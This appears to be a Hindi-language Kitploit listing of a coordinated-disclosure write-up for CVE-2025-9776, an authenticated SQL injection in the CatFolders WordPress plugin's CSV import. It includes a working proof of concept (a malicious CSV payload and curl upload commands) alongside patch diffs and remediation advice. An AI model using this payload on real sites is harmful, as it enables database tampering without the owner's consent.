Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-9776 — CVE-2025-9776 — CatFolders WordPress Plugin: Authenticated SQL Injection via CSV Import | POC + Walkthrough | Kitploit
उपकरण/GitHubGitHub/snailsploit/cve-2025-9776
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPapers & ResearchLearning & Education
GitHubsnailsploit/cve-2025-9776

CVE-2025-9776

CVE-2025-9776 — CatFolders WordPress Plugin: Authenticated SQL Injection via CSV Import | POC + Walkthrough

रिपॉजिटरी देखें
13 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-9776: CatFolders WordPress प्लगइन में प्रमाणित SQL इंजेक्शन

CVE CVSS Score WordPress Plugin CWE-89 Wordfence

कीवर्ड: CVE-2025-9776, CatFolders WordPress भेद्यता, SQL इंजेक्शन WordPress, प्रमाणित SQL इंजेक्शन, WordPress सुरक्षा, CSV आयात भेद्यता, WordPress प्लगइन शोषण, CWE-89, WordPress डेटाबेस हमला, मीडिया लाइब्रेरी भेद्यता, WordPress CVE 2025

विषय-सूची

  • अवलोकन
  • भेद्यता विवरण
  • तकनीकी विश्लेषण
  • प्रमाण-अवधारणा
  • उपचार मार्गदर्शिका
  • CVSS मेट्रिक्स
  • संदर्भ
  • सुरक्षा संपर्क

अवलोकन

CatFolders WordPress प्लगइन में एक प्रमाणित SQL इंजेक्शन भेद्यता पाई गई है जो Author-स्तर के उपयोगकर्ताओं को दुर्भावनापूर्ण CSV आयात के माध्यम से डेटाबेस क्वेरी में हेरफेर करने की अनुमति देती है।

खोजकर्ता: Kai Aizen (SnailSploit) प्रकाशित: 2025 CVSS स्कोर: 6.5 (मध्यम) CWE: CWE-89 - SQL इंजेक्शन

भेद्यता विवरण

विवरण

CatFolders – Tame Your WordPress Media Library by Category में CSV आयात कार्यक्षमता में एक प्रमाणित SQL इंजेक्शन भेद्यता शामिल है। उपयोगकर्ता द्वारा प्रदान की गई CSV से attachments कॉलम को एक सूची में विभाजित किया जाता है और सीधे FolderModel::set_attachments() को भेजा जाता है, जो उन मानों को उचित स्वच्छता या पैरामीटराइजेशन के बिना कच्चे SQL IN (...) खंडों में जोड़ता है।

प्रभाव

यह भेद्यता प्रमाणित हमलावरों को Author-स्तर के विशेषाधिकारों के साथ निम्नलिखित की अनुमति देती है:

  • मनमानी SQL क्वेरी निष्पादित करना
  • फ़ोल्डर-अटैचमेंट मैपिंग का सामूहिक विलोपन या हेरफेर
  • पेलोड और डेटाबेस संरचना के आधार पर संभावित डेटा एक्सपोज़र
  • डेटाबेस अखंडता और उपलब्धता से समझौता करना

प्रभावित संस्करण

  • असुरक्षित: सभी संस्करण ≤ 2.5.2
  • पैच किया गया: संस्करण 2.5.3 और उसके बाद (विक्रेता से सत्यापित करें)

CVSS v3.1 मेट्रिक्स

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

तकनीकी विवरण

असुरक्षित कोड पथ

भेद्यता CSV आयात वर्कफ़्लो में मौजूद है:

फ़ाइल: includes/Rest/Controllers/ImportController.php

  1. import_csv विधि प्रति-फ़ील्ड स्वच्छता के बिना अपलोड की गई CSV को पार्स करती है
  2. restore_folders() कॉल करता है:
root@kitploit:~
FolderModel::set_attachments( 
    $new_folder['id'], 
    explode(',', $folder['attachments']), 
    false 
);

फ़ाइल: includes/Models/FolderModel.php

  1. set_attachments() स्ट्रिंग संयोजन का उपयोग करके कच्चा SQL बनाता है:
root@kitploit:~
'raw' => 'post_id IN (' . $attachmentIds . ')'
  1. प्रत्येक तत्व को पूर्णांक में नहीं डाला जाता और न ही पैरामीटराइज़ किया जाता है, जिससे SQL इंजेक्शन संभव होता है

हमला वेक्टर

Author-स्तर के विशेषाधिकारों (upload_files क्षमता) वाला हमलावर CSV आयात एंडपॉइंट के माध्यम से दुर्भावनापूर्ण SQL इंजेक्ट कर सकता है:

दुर्भावनापूर्ण CSV पेलोड:

root@kitploit:~
id,name,attachments
1,Test Folder,"1) OR 1=1--"

परिणामी असुरक्षित क्वेरी:

root@kitploit:~
SELECT folder_id FROM wp_catf_folder_posts 
WHERE post_id IN (1) OR 1=1--)

यह IN(...) खंड से बाहर निकलता है और क्वेरी के अर्थ को बदल देता है, संभावित रूप से सभी पंक्तियों को प्रभावित करता है।

आवश्यक शर्तें

  • लक्ष्य WordPress साइट पर Author-स्तर का खाता (या उच्चतर)
  • CatFolders प्लगइन स्थापित और सक्रिय
  • REST API आयात एंडपॉइंट तक पहुंच

प्रमाण-अवधारणा

चरण 1: REST नेमस्पेस खोजें

root@kitploit:~
curl -s https://target.site/wp-json | jq -r '.routes | keys[]' | grep '/import-csv$'

सामान्य परिणाम: /catf/v1/import-csv

चरण 2: दुर्भावनापूर्ण CSV तैयार करें

catf_inject.csv नामक फ़ाइल बनाएँ:

root@kitploit:~
id,name,attachments
1,Malicious Folder,"1) OR 1=1--"

चरण 3: हमला निष्पादित करें

root@kitploit:~
NS="/catf/v1"  # खोजे गए नेमस्पेस से बदलें

curl -i \
  -u 'author_user:APPLICATION_PASSWORD' \
  -F "file=@catf_inject.csv;type=text/csv" \
  -X POST "https://target.site/wp-json${NS}/import-csv"

अपेक्षित प्रतिक्रिया:

root@kitploit:~
{ "success": true }

प्रभाव प्रदर्शन

सर्वर निर्माण और निष्पादित करता है:

root@kitploit:~
SELECT folder_id FROM wp_catf_folder_posts WHERE post_id IN (1) OR 1=1--)

यह इच्छित से अधिक व्यापक DELETE/INSERT संचालन कर सकता है, अक्सर पूरे डेटाबेस में फ़ोल्डर-अटैचमेंट संबंधों को मिटा देता है।

सुरक्षित परीक्षण वातावरण

भेद्यता को सुरक्षित रूप से देखने के लिए स्टैंडअलोन SQLite सिमुलेशन चलाएँ:

root@kitploit:~
python3 poc/catfolders_sql_poc.py

यह असुरक्षित क्वेरी प्रिंट करता है और दिखाता है कि कैसे एक दुर्भावनापूर्ण टोकन सभी पंक्तियाँ लौटाता है, जबकि पैरामीटराइज़्ड संस्करण इसे ठीक से अस्वीकार करता है।

उपचार

साइट प्रशासकों के लिए

तत्काल कार्रवाई आवश्यक:

  1. CatFolders को 2.5.3 या बाद के संस्करण में अपडेट करें
  2. Author-स्तर या उच्चतर विशेषाधिकारों वाले उपयोगकर्ता खातों की समीक्षा करें
  3. प्रभावित तिथियों के बीच संदिग्ध क्वेरी के लिए डेटाबेस लॉग ऑडिट करें
  4. अप्रत्याशित संशोधनों के लिए फ़ोल्डर-अटैचमेंट मैपिंग जाँचें

डेवलपर्स के लिए

दो न्यूनतम सख्तीकरण चरण:

1. मॉडल को कॉल करने से पहले IDs को स्वच्छ करें

root@kitploit:~
- FolderModel::set_attachments( $new_folder['id'], explode(',', $folder['attachments']), false );
+ $ids = array_filter( array_map( 'intval', explode(',', $folder['attachments']) ) );
+ if ( ! empty( $ids ) ) {
+     FolderModel::set_attachments( (int) $new_folder['id'], $ids, false );
+ }

2. set_attachments() के अंदर पूर्णांक लागू करें

root@kitploit:~
  $imgIds = apply_filters( 'catf_attachment_ids_to_folder', $imgIds );
+ $imgIds = array_values( array_filter( array_map( 'intval', (array) $imgIds ) ) );

मजबूत सिफारिश

सभी कच्चे SQL संयोजन को WordPress के $wpdb->prepare() का उपयोग करके पैरामीटराइज़्ड क्वेरी से बदलें:

root@kitploit:~
$placeholders = implode(',', array_fill(0, count($imgIds), '%d'));
$query = $wpdb->prepare(
    "SELECT folder_id FROM {$wpdb->prefix}catf_folder_posts WHERE post_id IN ($placeholders)",
    ...$imgIds
);

इसके अतिरिक्त:

  • प्रसंस्करण से पहले सभी CSV फ़ील्ड को सख्ती से मान्य करें
  • API परत पर इनपुट प्रकार सत्यापन लागू करें
  • आयात एंडपॉइंट पर दर सीमा जोड़ें
  • ऑडिट ट्रेल के लिए सभी आयात संचालन लॉग करें

पैच फ़ाइल

एक पूर्ण पैच patch/catfolders_fix.patch में उपलब्ध है

रिपॉजिटरी संरचना

root@kitploit:~
CVE-2025-9776/
├── README.md                    # यह फ़ाइल
├── poc/
│   ├── catf_inject.csv         # दुर्भावनापूर्ण CSV पेलोड
│   └── catfolders_sql_poc.py   # सुरक्षित SQLite सिमुलेशन
└── patch/
    └── catfolders_fix.patch    # अनुशंसित सुधार

समयरेखा

  • खोज तिथि: 2025
  • विक्रेता सूचना: Wordfence के माध्यम से समन्वित प्रकटीकरण
  • सार्वजनिक प्रकटीकरण: 2025
  • पैच उपलब्ध: संस्करण 2.5.3

संदर्भ

  • MITRE CVE प्रविष्टि
  • Wordfence इंटेलिजेंस सलाहकार
  • WordPress प्लगइन निर्देशिका
  • SnailSploit अनुसंधान

क्रेडिट

शोधकर्ता: Kai Aizen (SnailSploit)

प्रकटीकरण प्रक्रिया: Wordfence बग बाउंटी प्रोग्राम के माध्यम से समन्वित

नैतिक विचार

⚠️ महत्वपूर्ण अस्वीकरण

यह प्रमाण-अवधारणा विशेष रूप से रक्षात्मक अनुसंधान और शैक्षिक उद्देश्यों के लिए प्रदान की गई है।

उपयोग दिशानिर्देश

  • ✅ करें: अपने स्वयं के सिस्टम पर या स्पष्ट लिखित प्राधिकरण के साथ परीक्षण करें
  • ✅ करें: सुरक्षा प्रशिक्षण और जागरूकता के लिए उपयोग करें
  • ✅ करें: अपने कोड में सुधार लागू करें
  • ❌ न करें: अनुमति के बिना सिस्टम के विरुद्ध परीक्षण करें
  • ❌ न करें: दुर्भावनापूर्ण उद्देश्यों के लिए उपयोग करें
  • ❌ न करें: उत्पादन वातावरण में शोषण करें

कानूनी नोटिस

कंप्यूटर सिस्टम तक अनधिकृत पहुंच निम्नलिखित कानूनों के तहत अवैध है:

  • कंप्यूटर फ्रॉड एंड एब्यूज एक्ट (CFAA) - संयुक्त राज्य अमेरिका
  • कंप्यूटर मिसयूज़ एक्ट - यूनाइटेड किंगडम
  • अन्य न्यायक्षेत्रों में समान विधान

अपने जोखिम पर उपयोग करें। शोधकर्ता और SnailSploit इस जानकारी के दुरुपयोग के लिए कोई देयता नहीं मानते हैं।

संपर्क

इस भेद्यता के बारे में प्रश्नों या अतिरिक्त जानकारी के लिए:

  • ईमेल: [email protected]
  • LinkedIn: linkedin.com/in/kaiaizen
  • वेबसाइट: snailsploit.com
  • संगठन: SnailSploit सुरक्षा अनुसंधान

सुरक्षित रहें और अपने WordPress इंस्टॉलेशन को अपडेट रखें!

अंतिम अद्यतन: 13 अक्टूबर, 2025


📚 दस्तावेज़ीकरण और लेखक

इस परियोजना का पूर्ण लेखन, पद्धति और संबंधित अनुसंधान यहाँ रहता है:

https://snailsploit.com/security-research/cves/cve-2025-9776/

Kai Aizen द्वारा निर्मित — स्वतंत्र आक्रामक सुरक्षा शोधकर्ता।

snailsploit.com · अनुसंधान · फ्रेमवर्क · GitHub · LinkedIn · ResearchGate · X/Twitter

एक ही हमला। अलग सब्सट्रेट।

टूल डाउनलोड करें
मीट्रिकमान
हमला वेक्टरनेटवर्क (AV:N)
हमला जटिलताकम (AC:L)
आवश्यक विशेषाधिकारकम (PR:L) - Author+
उपयोगकर्ता सहभागिताकोई नहीं (UI:N)
दायराअपरिवर्तित (S:U)
गोपनीयताकोई नहीं (C:N)
अखंडताकम (I:L)
उपलब्धताकम (A:L)